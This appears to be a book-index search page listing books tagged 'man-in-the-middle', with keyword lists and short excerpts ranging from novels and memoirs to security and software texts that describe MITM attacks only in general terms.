air gap, barriers to entry, complexity theory, data acquisition, Dr. Strangelove, escalation ladder, Golden arches theory, Herman Kahn, information security, Just-in-time delivery, launch on warning, military-industrial complex, MITM: man-in-the-middle, nuclear winter, off-the-grid, packet switching, RAND corporation, Robert Hanssen: Double agent, Ronald Reagan, Seymour Hersh, Silicon Valley, smart grid, South China Sea, Steve Jobs, systems thinking, Timothy McVeigh, trade route, undersea cable, Y2K, zero day

The standard Ethernet protocol tells your computer to ignore everything that is not addressed to it, but that doesn’t mean it has to. An advanced packet sniffer on an Ethernet network can look at all the traffic. Your neighbors could sniff everything on the Internet on your street. More advanced sniffers can trick the network in what is known as a “man-in-the-middle” attack. The sniffer appears to the router as the user’s computer. All information is sent to the sniffer, which then copies the information before passing it on to the real addressee. Many (but not most) websites now use a secure, encrypted connection when you log on so that your password is not sent in the clear for anyone sniffing around to pick up.


pages: 317 words: 98,745

Black Code: Inside the Battle for Cyberspace by Ronald J. Deibert

4chan, air gap, Any sufficiently advanced technology is indistinguishable from magic, Brian Krebs, call centre, citizen journalism, Citizen Lab, cloud computing, connected car, corporate social responsibility, crowdsourcing, cuban missile crisis, data acquisition, digital divide, disinformation, end-to-end encryption, escalation ladder, Evgeny Morozov, failed state, Firefox, Gabriella Coleman, global supply chain, global village, Google Hangouts, Hacker Ethic, Herman Kahn, informal economy, information security, invention of writing, Iridium satellite, jimmy wales, John Gilmore, John Markoff, Kibera, Kickstarter, knowledge economy, Lewis Mumford, low earth orbit, Marshall McLuhan, military-industrial complex, MITM: man-in-the-middle, mobile money, mutually assured destruction, Naomi Klein, new economy, Occupy movement, off-the-grid, Panopticon Jeremy Bentham, planetary scale, rent-seeking, Ronald Reagan, Ronald Reagan: Tear down this wall, Silicon Valley, Silicon Valley startup, Skype, smart grid, South China Sea, Steven Levy, Streisand effect, Stuxnet, Ted Kaczynski, the medium is the message, Turing test, Twitter Arab Spring, undersea cable, unit 8200, We are Anonymous. We are Legion, WikiLeaks, Yochai Benkler, zero day

See also Citizen Lab, “Planet Blue Coat: Mapping Censorship and Surveillance Tools,” January 15, 2013, https​://citi​zenla​b.org​/plan​etblue​coat. 4 the website of Al-Manar: Citizen Lab documented the hosting of Hezbullah and Syrian government websites on servers based in Canada in “The Canadian Connection: An Investigation of Syrian Government and Hezbullah Web Hosting in Canada,” November 17, 2011, ​htt​p://citizenlab.or​g/wp-con​tent/up​loads​/20​11/​11/​canad​ian​_​conne​ctio​n.pdf; and “The Canadian Connection: One Year Later,” November 14, 2012, htt​ps://​citize​nlab.or​g/20​12/1​1/t​he-can​adia​n-co​nnect​ion-o​ne-ye​ar-lat​er/. 5 reports from inside Syria of phishing attacks: On phishing attacks around the Syrian conflict, see Eva Galperin and Morgan Marquis-Boire, “Syrian Activists Targeted with Facebook Phishing Attack,” Electronic Frontier Foundation, March 29, 2012, htt​ps://w​ww.eff.o​rg/deep​links​/201​2/03​/pro-s​yrian-gov​ernment-​hackers-t​arget-syri​an-activ​ists-fac​ebook-ph​ishin​g-att​ack; and Eva Galperin and Morgan Marquis-Boire, “New Wave of Facebook Phishing Attacks Targets Syrian Activists,” Electronic Frontier Foundation, April 24, 2012, http​s://www.ef​f.org/dee​plinks​/20​12/0​4/new-w​ave-face​book-ph​ishi​ng-att​acks-tar​gets-syr​ian-acti​vists. See also Peter Eckersley, “A Syrian Man-In-The-Middle Attack Against Facebook,” Electronic Frontier Foundation, May 5, 2011, https​://www.ef​f.org/de​eplin​ks/201​1/​05/​syri​an-ma​n-midd​le-aga​inst-f​acebo​ok; and Jennifer Preston, “Seeking to Disrupt Protesters, Syria Cracks Down on Social Media,” New York Times, March 23, 2011, http://ww​w.nytim​es.com/20​11/05/23​/world/​middlee​ast/23fac​ebook.​html​?


pages: 342 words: 94,762

Wait: The Art and Science of Delay by Frank Partnoy

algorithmic trading, Atul Gawande, behavioural economics, Bernie Madoff, Black Swan, blood diamond, Cass Sunstein, Checklist Manifesto, cognitive bias, collapse of Lehman Brothers, collateralized debt obligation, computerized trading, corporate governance, cotton gin, Daniel Kahneman / Amos Tversky, delayed gratification, Flash crash, Frederick Winslow Taylor, George Akerlof, Google Earth, Hernando de Soto, High speed trading, impulse control, income inequality, information asymmetry, Isaac Newton, Long Term Capital Management, Menlo Park, mental accounting, meta-analysis, MITM: man-in-the-middle, Nick Leeson, paper trading, Paul Graham, payday loans, Pershing Square Capital Management, Ralph Nader, Richard Thaler, risk tolerance, Robert Shiller, Ronald Reagan, Saturday Night Live, scientific management, six sigma, social discount rate, Spread Networks laid a new fibre optics cable between New York and Chicago, Stanford marshmallow experiment, statistical model, Steve Jobs, systems thinking, The Market for Lemons, the scientific method, The Wealth of Nations by Adam Smith, upwardly mobile, Walter Mischel, work culture

., huge volumes of data that we’ve been collecting and validating on thousands of other couples for more than thirty years.”35 It turns out that a doctor glancing at a photograph of a black patient and a student watching a two-second video of a teacher are performing similar tasks. So is a young American woman looking at images of terrorist cells in the Middle East, or a young man in the Middle East looking at images of ostentatious wealth in America. Or any number of people everywhere who judge others based on first impressions. When we thin-slice, we reach powerful unconscious conclusions about others in seconds. Unfortunately, they are often wrong. Fortunately, they can be consciously unwound.


pages: 299 words: 87,059

The Burning Land by George Alagiah

"World Economic Forum" Davos, fear of failure, gentrification, land reform, MITM: man-in-the-middle, Nelson Mandela, out of africa, pre–internet, urban decay, white flight, éminence grise

‘You think this is Motlantshe? You think he can do all these deals on his own and just keep the money to himself?’ Patel turned the engine off. ‘Ms Seaton, you need to know this whole stinking business goes all the way to the top. Those chaps in Pretoria are getting their cut. Motlantshe is just the deal-maker, the man in the middle.’ ‘But the figures are all published.’ ‘Oh, yes, they publish the figures they want you to see. The government got all these farms around here for nothing. Why didn’t the farmers shout and scream, eh?’ ‘You tell me.’ ‘Because our friend Motlantshe went round afterwards and paid them off.’


pages: 342 words: 104,315

The Icon Thief by Alec Nevala-Lee

fixed-gear, index card, MITM: man-in-the-middle

Aside from the three men on the couch, the sales floor was deserted. As they approached the Armenians, Ilya saw that the two on either side were barely out of high school, while the third seemed in his late twenties. When the two groups were close enough, Sharkovsky came forward, met by the man in the middle, and they shook hands twice, first the right, then the left. Standing back, Sharkovsky studied the younger man. “How is your grandfather, Arshak?” Arshak made a noncommittal gesture. “Are we here to talk, or to do business?” Sharkovsky did not seem troubled by this show of impatience. “Business, if you like.


pages: 419 words: 102,488

Chaos Engineering: System Resiliency in Practice by Casey Rosenthal, Nora Jones

Amazon Web Services, Asilomar, autonomous vehicles, barriers to entry, blockchain, business continuity plan, business intelligence, business logic, business process, cloud computing, cognitive load, complexity theory, continuous integration, cyber-physical system, database schema, DevOps, fail fast, fault tolerance, hindsight bias, human-factors engineering, information security, Kanban, Kubernetes, leftpad, linear programming, loose coupling, microservices, MITM: man-in-the-middle, no silver bullet, node package manager, operational security, OSI model, pull request, ransomware, risk tolerance, scientific management, Silicon Valley, six sigma, Skype, software as a service, statistical model, systems thinking, the scientific method, value engineering, WebSocket

There is a probe effect in taking the measurements, and another in the layer of the system in order to inject a fault or other variable. Consider a software system where you want to perform some chaos experiments deep in the Linux kernel on some kind of low-latency IO interface. You wire up a piece of software somewhere in the “signal path” of the IO interface to give yourself a man-in-the-middle. On the output you want to flip some bits so that any upstream application depending on this interface is affected by your chaos probe, but you don’t want it to be active all the time, so you need to be able to turn it on and off. In the naive case you’ve stuck yourself in the middle. Now for every bit that goes out this interface you’ve inserted a conditional, “Am I running a chaos experiment right now or not?”


Reaper Force: The Inside Story of Britain’s Drone Wars by Dr Peter Lee

crew resource management, Daniel Kahneman / Amos Tversky, digital map, illegal immigration, job satisfaction, MITM: man-in-the-middle, no-fly zone, operational security, QWERTY keyboard, Skype

He often had a child in the car, travelling around with him. We were flying a very tight orbit to make sure we never lost sight of the car, and always knew who was or wasn’t in it. This time the child wasn’t. The man drove off. Once we were established in an appropriate kill zone then that was it: a moving HVT was my first shot. It wasn’t an armed man in the middle of a field with more fields all around. It was reasonably high pressured – in my mind, anyway. Every time will feel something like that, but there is more pressure on you the first time. My heart has never gone so fast. I’ve done a lot of silly things in my time that have raised my heart rate quite considerably, but not like this.


pages: 335 words: 100,154

Freezing Order: A True Story of Money Laundering, Murder, and Surviving Vladimir Putin's Wrath by Bill Browder

"World Economic Forum" Davos, 3D printing, activist lawyer, Bellingcat, Berlin Wall, Bernie Madoff, bitcoin, Boris Johnson, Clive Stafford Smith, crowdsourcing, disinformation, Donald Trump, estate planning, fake news, MITM: man-in-the-middle, Nelson Mandela, Ponzi scheme, power law, Robert Bork, Ronald Reagan, Seymour Hersh, Silicon Valley, Skype, Steve Bannon

But guess who the Interior Ministry put on it?” “No idea.” Vadim grabbed a DVD, came around to my desk, and popped it into my computer. It was a video of a TV report on the Mikhailovsky GOK investigation he’d found online. He paused on a scene showing three young men hunkered over a pile of binders and paperwork. Vadim pointed to the man in the middle. “Recognize him?” I leaned closer. The man was looking down and I could only make out the top of his head, but his haircut was unmistakable. “That’s Karpov!” This was the same high-spending Interior Ministry officer involved in the $230 million fraud. “Yep. And check this out.” Pavel Karpov (center on screen). (© HERMITAGE) Vadim laid out two spreadsheets—travel records for Klyuev and Karpov.


pages: 340 words: 101,675

A New History of the Future in 100 Objects: A Fiction by Adrian Hon

Adrian Hon, air gap, Anthropocene, augmented reality, blockchain, bounce rate, call centre, carbon credits, carbon tax, Cepheid variable, charter city, Clayton Christensen, clean water, cognitive dissonance, congestion charging, creative destruction, CRISPR, crowdsourcing, cryptocurrency, deepfake, defense in depth, discrete time, disinformation, disintermediation, driverless car, drone strike, food desert, game design, gamification, gravity well, hive mind, hydroponic farming, impulse control, income inequality, job automation, Kickstarter, Kim Stanley Robinson, knowledge worker, life extension, lifelogging, low earth orbit, machine translation, MITM: man-in-the-middle, moral panic, Neal Stephenson, no-fly zone, off grid, offshore financial centre, oil shale / tar sands, orbital mechanics / astrodynamics, peak oil, peer-to-peer, phenotype, planned obsolescence, post scarcity, precariat, precautionary principle, prediction markets, rewilding, Silicon Valley, skeuomorphism, Skype, smart contracts, social graph, South Sea Bubble, speech recognition, stem cell, Stewart Brand, synthetic biology, technoutopianism, telepresence, transfer pricing, tulip mania, Turing test, urban sprawl, Vernor Vinge, VTOL, working-age population

Some adherents use a ceremonial hammer to smash a replica of an ancient spinning hard disk to commemorate the loss and the opportunity for growth. PHYSICAL SYNC This ritual grew out of the entirely practical requirement for security-conscious groups to swap their cryptographic “public keys” in person to prevent impersonation or man-in-the-middle attacks. These groups included distributed amplified teams, which took advantage of the physical proximity to become familiar with one another and to establish emotional trust through intense experiences. These could include extreme physical sports, group meditation, mutual grooming, and dancing.


pages: 628 words: 107,927

Node.js in Action by Mike Cantelon, Marc Harter, Tj Holowaychuk, Nathan Rajlich

Amazon Web Services, business logic, Chris Wanstrath, create, read, update, delete, Debian, en.wikipedia.org, Firefox, Google Chrome, machine readable, MITM: man-in-the-middle, MVC pattern, node package manager, p-value, pull request, Ruby on Rails, SQL injection, web application, WebSocket

You’ll see that both cookies are available as properties of req.cookies: $ curl http://localhost:3000/ -H "Cookie: foo=bar, bar=baz" { foo: 'bar', bar: 'baz' } {} Signed cookies Signed cookies are better suited for sensitive data, as the integrity of the cookie data can be verified, helping to prevent man-in-the-middle attacks. Signed cookies are placed in the req.signedCookies object when valid. The reasoning behind having two separate objects is that it shows the developer’s intention. If you were to place both signed and unsigned cookies in the same object, a regular cookie could be crafted to contain data to mimic a signed cookie.


pages: 366 words: 107,145

Fuller Memorandum by Stross, Charles

Any sufficiently advanced technology is indistinguishable from magic, Beeching cuts, Bletchley Park, British Empire, carbon credits, cognitive dissonance, complexity theory, congestion charging, Crossrail, death from overwork, dumpster diving, escalation ladder, false flag, finite state, Firefox, Herman Kahn, HyperCard, invisible hand, land reform, linear programming, messenger bag, MITM: man-in-the-middle, operational security, peak oil, Plato's cave, post-work, prosperity theology / prosperity gospel / gospel of success, quantum entanglement, reality distortion field, security theater, sensible shoes, side project, Sloane Ranger, telemarketer, Turing machine

It's not her fault she doesn't know where the dividing line between IT support scut-work and OPSEC protocol lies, although she catches on fast when I explain the predilection of class G3 abominations for traveling down Cat 5e cables and eating clerical staff, not to say anything about the ease with which a bad guy could stick a network sniffer on our backbone and do a man-in-the-middle attack on our authentication server if we let random cable installers loose under the floor tiles in the new building. Finally she leaves me alone, and I open the cover on BLOODY BARON and start reading. AN HOUR AND A HALF LATER I'M THOROUGHLY SPOOKED BY MY reading--so much so that I've had to put the file down a couple of times when I caught myself scanning the same sentence over and over again with increasing disbelief.


pages: 339 words: 103,546

Blood and Oil: Mohammed Bin Salman's Ruthless Quest for Global Power by Bradley Hope, Justin Scheck

"World Economic Forum" Davos, augmented reality, Ayatollah Khomeini, Boston Dynamics, clean water, coronavirus, distributed generation, Donald Trump, Downton Abbey, Elon Musk, Exxon Valdez, financial engineering, Google Earth, high net worth, Jeff Bezos, Marc Andreessen, Mark Zuckerberg, Masayoshi Son, megaproject, MITM: man-in-the-middle, new economy, NSO Group, Peter Thiel, public intellectual, ride hailing / ride sharing, Sand Hill Road, Silicon Valley, SoftBank, South of Market, San Francisco, sovereign wealth fund, starchitect, Steve Bannon, Steve Jobs, tech billionaire, Tim Cook: Apple, trade route, traumatic brain injury, Travis Kalanick, Uber for X, urban planning, Virgin Galactic, Vision Fund, WeWork, women in the workforce, young professional, zero day

Wearing an open-necked shirt, Mohammed referred to advances in medicine that could make it possible for NEOM residents to live much longer than anyone in history. He might live hundreds of years, he said, explaining that he’d already begun investing in longevity research. One guest was unnerved: Did he think he would be ruler of Saudi Arabia until he was in his three hundreds? Was this the most powerful man in the Middle East? Chapter 18 Cold Blood October 2, 2018 As Jamal Khashoggi landed in Istanbul just before 4 a.m., the fifteen-man kill team was already getting into place. Zipping through customs, Khashoggi made his way to his new apartment in Zeytinburnu, on the European side of the city.


pages: 412 words: 104,864

Silence on the Wire: A Field Guide to Passive Reconnaissance and Indirect Attacks by Michal Zalewski

active measures, Alan Turing: On Computable Numbers, with an Application to the Entscheidungsproblem, AltaVista, Charles Babbage, complexity theory, dark matter, data acquisition, Donald Knuth, fault tolerance, information security, MITM: man-in-the-middle, NP-complete, OSI model, Silicon Valley, speech recognition, Turing complete, Turing machine, Vannevar Bush

[2] A number that is coprime to x (also called relatively prime to x) shares no common factors with x, other than 1 and −1. (Their greatest common divisor is 1.) [3] For the sake of completeness, it should be noted that adhoc public key cryptography is, among other things, vulnerable to “man in the middle” attacks, where an attacker impersonates one of the endpoints and provides its own, fake public key, in order to be able to intercept communications. To prevent such attacks, additional means of verifying the authenticity of a key must be devised, either by arranging a secure exchange or establishing a central authority to issue or certify keys (public key infrastructure, PKI).


pages: 629 words: 109,663

Docker in Action by Jeff Nickoloff, Stephen Kuenzli

air gap, Amazon Web Services, cloud computing, computer vision, continuous integration, database schema, Debian, end-to-end encryption, exponential backoff, fail fast, failed state, information security, Kubernetes, microservices, MITM: man-in-the-middle, peer-to-peer, software as a service, web application

This makes access-control requirements one of the least flexible and most important to consider. Integrity Artifact integrity and confidentiality both fall in the less-flexible and more-technical end of the spectrum. Artifact integrity is trustworthiness and consistency of your files and images. Violations of integrity may include man-in-the-middle attacks, in which an attacker intercepts your image downloads and replaces the content with their own. They might also include malicious or hacked registries that lie about the payloads they return. Confidentiality Artifact confidentiality is a common requirement for companies developing trade secrets or proprietary software.


pages: 379 words: 113,656

Six Degrees: The Science of a Connected Age by Duncan J. Watts

AOL-Time Warner, Berlin Wall, Bretton Woods, business process, corporate governance, Drosophila, Erdős number, experimental subject, fixed income, Frank Gehry, Geoffrey West, Santa Fe Institute, independent contractor, industrial cluster, invisible hand, it's over 9,000, Long Term Capital Management, market bubble, Milgram experiment, MITM: man-in-the-middle, Murray Gell-Mann, Network effects, new economy, Norbert Wiener, PalmPilot, Paul Erdős, peer-to-peer, power law, public intellectual, rolodex, Ronald Coase, Savings and loan crisis, scientific worldview, Silicon Valley, social contagion, social distancing, Stuart Kauffman, supply-chain management, The Nature of the Firm, the strength of weak ties, The Wealth of Nations by Adam Smith, Toyota Production System, Tragedy of the Commons, transaction costs, transcontinental railway, vertical integration, Vilfredo Pareto, Y2K

The result, a program they nicknamed Napster, became an overnight phenomenon, attracting tens of millions of users and the ire of the entire recording industry, and throwing Fanning into the midst of a worldwide commercial, legal, and ethical maelstrom. At least for a while, Fanning was the man in the middle, lionized by some and demonized by others, quoted in business papers and pictured on magazine covers. Before finally being forced to charge fees for its music-sharing services, Napster (now largely defunct) and Fanning had succeeded in striking a deal with the global publishing giant Bertelsmann.


Wireless by Charles Stross

air gap, anthropic principle, back-to-the-land, Benoit Mandelbrot, Buckminster Fuller, Cepheid variable, cognitive dissonance, colonial exploitation, cosmic microwave background, Easter island, epigenetics, finite state, Georg Cantor, gravity well, hive mind, hydroponic farming, jitney, Khyber Pass, Late Heavy Bombardment, launch on warning, lifelogging, Magellanic Cloud, mandelbrot fractal, MITM: man-in-the-middle, Neil Armstrong, peak oil, phenotype, Pluto: dwarf planet, security theater, sensible shoes, Turing machine, undersea cable

“Running late,” he pants, kicking at the pigeons until they flap away to make space for him at the other end of the bench. “Really?” Brundle nods. “They should be coming over the horizon in another five minutes.” “How did you engineer it?” Gregor isn’t particularly interested, but technical chitchat serves to pass the remaining seconds. “Man-in-the-middle, ramified by all their intelligence assessments.” Brundle looks self-satisfied. “Understanding their caste specialization makes it easier. Two weeks ago we told the GRU that MacNamara was using the NP-101 program as cover for a preemptive D-SLAM strike. At the same time we got the NOAA to increase their mapping-launch frequency, and pointed the increased level of Soviet activity out to our sources in SAC.


pages: 385 words: 115,697

The Forever War by Dexter Filkins

animal electricity, friendly fire, Khyber Pass, MITM: man-in-the-middle, Thomas L Friedman

You knew right then the video wasn’t going to end well. But in the video, the young man seemed remarkably calm; as if he hadn’t imagined what was coming. Five men stood behind him, each wearing a mask and black clothing. The pale-skinned young man introduced himself. “My name is Nicholas Berg, from West Chester, Pennsylvania.” The masked man in the middle began reading from a script. He had a hoarse, guttural voice, not the voice of a gentle man. “Where is the sense of honor, where is the rage?” the masked man asked. “Where is the anger for God’s religion?” Then, with a little flip of his hand, the man with the hoarse voice handed his script to a man on his left.


pages: 401 words: 112,784

Hard Times: The Divisive Toll of the Economic Slump by Tom Clark, Anthony Heath

Affordable Care Act / Obamacare, Alan Greenspan, British Empire, business cycle, Carmen Reinhart, classic study, credit crunch, Daniel Kahneman / Amos Tversky, debt deflation, deindustrialization, Etonian, eurozone crisis, falling living standards, full employment, Gini coefficient, Greenspan put, growth hacking, hedonic treadmill, hiring and firing, income inequality, interest rate swap, invisible hand, It's morning again in America, John Maynard Keynes: Economic Possibilities for our Grandchildren, Kenneth Rogoff, labour market flexibility, low interest rates, low skilled workers, MITM: man-in-the-middle, mortgage debt, new economy, Northern Rock, obamacare, oil shock, plutocrats, price stability, quantitative easing, Right to Buy, Ronald Reagan, science of happiness, statistical model, The Wealth of Nations by Adam Smith, unconventional monetary instruments, War on Poverty, We are the 99%, women in the workforce, working poor

The big difference concerns wages, which have subsequently climbed by only 0.6% annually at the median.17 That implies that the typical employee has now been missing out on something like three-quarters of the extra prosperity that America has been generating over 40 years. The graph below captures this great divergence for male workers, for whom it has been most acute. While overall American output has roughly doubled since the 1970s, mostly because of rising productivity, that the figure shows that the pay of the man in the middle, the median male worker, has barely budged. The woman in the middle has not fared quite so badly, but her modest progress has certainly not made up for the difficulties of the men: typical working-age household incomes in 2010 were stuck at the levels of the late 1980s.18 This grim picture is not the product of interpretations or definitions: tinker with the composition of remuneration – by adding in pensions or healthcare, for instance – and it does not brighten.20 The old story of a rising tide lifting all boats has simply ceased to apply.


pages: 397 words: 114,841

High Steel: The Daring Men Who Built the World's Greatest Skyline by Jim Rasenberger

AOL-Time Warner, Bear Stearns, collective bargaining, Donald Trump, East Village, Ford Model T, illegal immigration, Lewis Mumford, MITM: man-in-the-middle, scientific management, strikebreaker, Tacoma Narrows Bridge, union organizing, urban planning, vertical integration, young professional

It is often taken, incorrectly, for a Lewis Hine photo; in fact, it was shot by a publicity photographer named Hamilton Wright, Jr. As for the identity of the ironworkers, many Mohawks are convinced that the fourth from the left is Joe Jocks of Kahnawake, while Newfoundlanders insist that the shirtless man in the middle is Ray Costello of Conception Harbour. Captions on other photographs taken that same day identify the three men on the far left as John O’Rielly [sic], George Covan, and Joseph Eckner. The shirtless man whom Newfoundlanders believe to be Ray Costello is identified elsewhere as Howard Kilgore (though people who knew Costello swear it’s he) and the next three are identified as William Birger, Joe Curtis, and John Portla.


pages: 426 words: 117,722

King Richard: Nixon and Watergate--An American Tragedy by Michael Dobbs

anti-communist, Berlin Wall, coronavirus, COVID-19, cuban missile crisis, desegregation, Donald Trump, MITM: man-in-the-middle, RAND corporation, rolodex, Ronald Reagan, Seymour Hersh, Ted Sorensen, éminence grise

The stunning developments in Judge Sirica’s courtroom had brought the Watergate scandal to the doorstep of the White House. In the opinion of the Washington Post columnist Joseph Kraft, what had previously been “a sideshow” had turned into “a political bomb that could blow the Nixon administration apart.” The “finger of guilt” was no longer pointing solely at senior Nixon aides like Mitchell and Haldeman. “The man in the middle” was now the president himself. According to James Reston of The New York Times, even Nixon supporters were now asking how “an Administration that has been so cautious, shrewd, and successful in dealing with world affairs could also be so reckless, awkward and even stupid in dealing with human affairs.”


pages: 368 words: 115,889

How Not to Grow Up: A Coming of Age Memoir. Sort Of. by Richard Herring

British Empire, MITM: man-in-the-middle, Russell Brand, Stephen Hawking

Part of me felt I was sliding further into the slippery pit of depravity, from which I might never escape, even though it provided me with some temporary comfort. And Chloe had a softness and a sweetness to her and genuinely seemed to like me and care about me, without being desirous of any kind of serious relationship. But I also liked the fact she was clearly naughty and adventurous and sexy. I was nothing if not a man in the middle of a midlife crisis. And conversely, we were both adults and both single and so where was the harm? Unless she turned out to be a psycho stalker, intent on selling her story of celebrity sleaze to a tabloid. If so she’d miscalculated wildly by choosing a celebrity who no one had ever heard of and who was more than likely to be the one brazenly writing about the experience himself.


pages: 409 words: 112,055

The Fifth Domain: Defending Our Country, Our Companies, and Ourselves in the Age of Cyber Threats by Richard A. Clarke, Robert K. Knake

"World Economic Forum" Davos, A Declaration of the Independence of Cyberspace, Affordable Care Act / Obamacare, air gap, Airbnb, Albert Einstein, Amazon Web Services, autonomous vehicles, barriers to entry, bitcoin, Black Lives Matter, Black Swan, blockchain, Boeing 737 MAX, borderless world, Boston Dynamics, business cycle, business intelligence, call centre, Cass Sunstein, cloud computing, cognitive bias, commoditize, computer vision, corporate governance, cryptocurrency, data acquisition, data science, deep learning, DevOps, disinformation, don't be evil, Donald Trump, Dr. Strangelove, driverless car, Edward Snowden, Exxon Valdez, false flag, geopolitical risk, global village, immigration reform, information security, Infrastructure as a Service, Internet of things, Jeff Bezos, John Perry Barlow, Julian Assange, Kubernetes, machine readable, Marc Benioff, Mark Zuckerberg, Metcalfe’s law, MITM: man-in-the-middle, Morris worm, move fast and break things, Network effects, open borders, platform as a service, Ponzi scheme, quantum cryptography, ransomware, Richard Thaler, Salesforce, Sand Hill Road, Schrödinger's Cat, self-driving car, shareholder value, Silicon Valley, Silicon Valley startup, Skype, smart cities, Snapchat, software as a service, Steven Levy, Stuxnet, technoutopianism, The future is already here, Tim Cook: Apple, undersea cable, unit 8200, WikiLeaks, Y2K, zero day

Against his initial instincts, he green-lit an audacious idea from his incident response team, who argued that instead of trying to get the adversary out of the network quickly, they needed to keep the adversary inside their network, to try to understand their intent and interests. They proposed firewalling off the intruder to limit what information he could access, and then doing their own man-in-the-middle attack to compromise his command and control and learn his tactics and techniques. “I’ve been on the job for three months, and I’m like, ‘Holy shit, you’ve got to be kidding me.’” But Gagnon saw the value in the intelligence he could collect. “So, I said I will do this once, but I will never do it again.”


pages: 444 words: 118,393

The Nature of Software Development: Keep It Simple, Make It Valuable, Build It Piece by Piece by Ron Jeffries

Amazon Web Services, anti-pattern, bitcoin, business cycle, business intelligence, business logic, business process, c2.com, call centre, cloud computing, continuous integration, Conway's law, creative destruction, dark matter, data science, database schema, deep learning, DevOps, disinformation, duck typing, en.wikipedia.org, fail fast, fault tolerance, Firefox, Hacker News, industrial robot, information security, Infrastructure as a Service, Internet of things, Jeff Bezos, Kanban, Kubernetes, load shedding, loose coupling, machine readable, Mars Rover, microservices, Minecraft, minimum viable product, MITM: man-in-the-middle, Morris worm, move fast and break things, OSI model, peer-to-peer lending, platform as a service, power law, ransomware, revision control, Ruby on Rails, Schrödinger's Cat, Silicon Valley, six sigma, software is eating the world, source of truth, SQL injection, systems thinking, text mining, time value of money, transaction costs, Turing machine, two-pizza team, web application, zero day

The default would be to download libraries from the Internet. (The standard joke for Maven users is that Maven downloads half of the Internet to run a build.) Downloading dependencies from the Internet is convenient but not safe. It’s far too easy for one of those dependencies to silently be replaced, either though a man-in-the-middle attack or by compromising the upstream repository. Even if you download dependencies from the Net to start with, you should plan on moving to a private repository as soon as possible. Only put libraries into the repository when their digital signatures match published information from the upstream provider.


pages: 481 words: 121,300

Why geography matters: three challenges facing America : climate change, the rise of China, and global terrorism by Harm J. De Blij

agricultural Revolution, airport security, Anton Chekhov, Ayatollah Khomeini, Berlin Wall, British Empire, colonial exploitation, complexity theory, computer age, crony capitalism, demographic transition, Deng Xiaoping, Eratosthenes, European colonialism, F. W. de Klerk, failed state, Fall of the Berlin Wall, Francis Fukuyama: the end of history, global village, Great Leap Forward, high-speed rail, illegal immigration, Internet Archive, John Snow's cholera map, Khyber Pass, manufacturing employment, megacity, megaproject, Mercator projection, MITM: man-in-the-middle, Nelson Mandela, Oklahoma City bombing, out of africa, RAND corporation, risk tolerance, Ronald Reagan, social distancing, South China Sea, special economic zone, Thomas Malthus, trade route, transatlantic slave trade, UNCLOS, UNCLOS

207 problems, France's quarrel with the United States over Iraq, prospects for the euro and EU enlargement, and the issue of a European Constitution, then very much in the news while it was being prepared, a momentous event in the EU's history. I went on too long and left no time for a Q&A session, but asked anyone with comments to come up to the lectern afterward. Soon a group of about a dozen listeners converged on me, and I could see that some of them were quite angry. "You were unfair to Germany's government!" shouted a man in the middle of the pack. Before I could answer, someone started a bitter complaint about my view of the French. "No," said the vociferous German, "he was quite right about you French. You want to run the European Union, but the British won't let you do it." In a few moments the Europeans among the group were in a shouting match with each other, no longer interested in arguing with me.


pages: 469 words: 124,784

Moon Shot: The Inside Story of America's Apollo Moon Landings by Jay Barbree, Howard Benedict, Alan Shepard, Deke Slayton, Neil Armstrong

Apollo 11, Apollo 13, Charles Lindbergh, clockwatching, Gene Kranz, gravity well, invisible hand, Kickstarter, low earth orbit, MITM: man-in-the-middle, Neil Armstrong, operation paperclip, orbital mechanics / astrodynamics, place-making

Alan, as chief of the Astronaut Office, was responsible for day-to-day operations. Astronauts were needed for spacecraft tests, for design reviews, for newspaper interviews. With equanimity, he distributed these seemingly limitless tasks to a very limited number of “his boys.” He was an impenetrable barrier to inappropriate or untimely requests. He was “the man in the middle” and handled it well. Moon Shot is their story. Much more than the story of their flights in space, it details their central role in the most exciting adventure in history. Jay Barbree, one of the world’s most experienced space journalists, reported the triumphs and the tragedies from the dawn of the space age.


pages: 468 words: 124,573

How to Build a Billion Dollar App: Discover the Secrets of the Most Successful Entrepreneurs of Our Time by George Berkowski

Airbnb, Amazon Web Services, Andy Rubin, barriers to entry, Black Swan, business intelligence, call centre, crowdsourcing, deal flow, Dennis Tito, disruptive innovation, Dunbar number, en.wikipedia.org, game design, Google Glasses, Google Hangouts, Google X / Alphabet X, growth hacking, iterative process, Jeff Bezos, Jony Ive, Kickstarter, knowledge worker, Lean Startup, loose coupling, Marc Andreessen, Mark Zuckerberg, Mary Meeker, minimum viable product, MITM: man-in-the-middle, move fast and break things, Network effects, Oculus Rift, Paul Graham, QR code, Ruby on Rails, Salesforce, self-driving car, Sheryl Sandberg, Silicon Valley, Silicon Valley startup, Skype, Snapchat, social graph, SoftBank, software as a service, software is eating the world, Steve Jobs, Steven Levy, subscription business, TechCrunch disrupt, Travis Kalanick, two-pizza team, ubercab, Y Combinator

That’s definitely not the easiest thing to do – and you’ll find that you’ll need to employ numerous simultaneous strategies to make it work. So what are the important things to get right in order to delight people? Design is one. If you’ve used the Hailo app you’ll have noticed there is a little blue man in the middle of the app who denotes your current location. In the very first version of Hailo, this little blue guy (whose nickname is Barty – named after a summer intern) was just a blue pin. The pin was clear, simple and well recognised. One of our designers – a rather emo-looking fellow, who plays in a band, loves tattoos and used to make video games at Electronic – didn’t think it was good enough.


pages: 381 words: 120,361

Sunfall by Jim Al-Khalili

airport security, artificial general intelligence, augmented reality, Bletchley Park, Carrington event, cosmological constant, cryptocurrency, dark matter, David Attenborough, Fellow of the Royal Society, Higgs boson, imposter syndrome, Intergovernmental Panel on Climate Change (IPCC), Internet of things, invisible hand, Kickstarter, lockdown, mass immigration, megacity, MITM: man-in-the-middle, off grid, pattern recognition, quantum cryptography, quantum entanglement, Silicon Valley, smart cities, sorting algorithm, South China Sea, stem cell, Stephen Hawking, Turing test

Wasn’t that the subject of last week’s lecture – something about the Ekert 91 protocol?’ Shireen grinned, suddenly feeling even more pleased with herself. ‘I know, foolproof, right? And you know as well as I do that every cyb in the world is looking for new attack strategies that target vulnerabilities in the system. And if you ask any of them they’ll tell you that the obvious man-in-the-middle attacks and the photon number splitting attacks don’t work. In fact, government and corporation sites don’t even bother following up on these cyber alerts any more. And that’s the beauty of it; they’re so cocksure their encryptions can’t be broken that no one is watching me.’ ‘And that’s what you think you’ve done, is it?


pages: 436 words: 131,430

House of God by Samuel Shem

affirmative action, index card, lateral thinking, medical residency, MITM: man-in-the-middle, Norman Mailer, placebo effect

